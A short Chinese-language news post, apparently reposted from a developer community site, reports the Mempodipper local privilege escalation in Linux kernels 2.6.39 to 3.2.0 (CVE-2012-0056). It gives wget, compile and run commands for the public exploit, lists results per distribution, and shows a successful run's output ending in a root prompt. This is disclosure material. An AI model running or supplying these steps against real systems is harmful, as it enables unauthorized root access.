Linux 2.6.39到3.2.0内核爆提权漏洞

　　来源：开源中国社区

　　Linux 2.6.39 到 3.2.0 内核爆提权漏洞，普通用户可以通过运行特定代码获得 root 权限。

　　重现方法：

　　wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

　　cc mempodipper.c

　　./a.out

　　在执行完毕后运行 whoami 来看是否执行成功。

　　已知发行版情况：

　　Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report

　　Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64

　　Arch Linux: 失败。内核 3.2.2-1-ARCH

　　看看一个成功的例子

　　===============================

　　= Mempodipper =

　　= by zx2c4 =

　　= Jan 21, 2012 =

　　===============================

　　[+] Ptracing su to find next instruction without reading binary.

　　[+] Creating ptrace pipe.

　　[+] Forking ptrace child.

　　[+] Waiting for ptraced child to give output on syscalls.

　　[+] Ptrace_traceme'ing process.

　　[+] Error message written. Single stepping to find address.

　　[+] Resolved call address to 0x401ce8.

　　[+] Opening socketpair.

　　[+] Waiting for transferred fd in parent.

　　[+] Executing child from child fork.

　　[+] Opening parent mem /proc/20553/mem in child.

　　[+] Sending fd 6 to parent.

　　[+] Received fd at 6.

　　[+] Assigning fd 6 to stderr.

　　[+] Calculating su padding.

　　[+] Seeking to offset 0x401cdc.

　　[+] Executing su with shellcode.

　　# whoami

　　root

　　Ubuntu11.10

　　Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux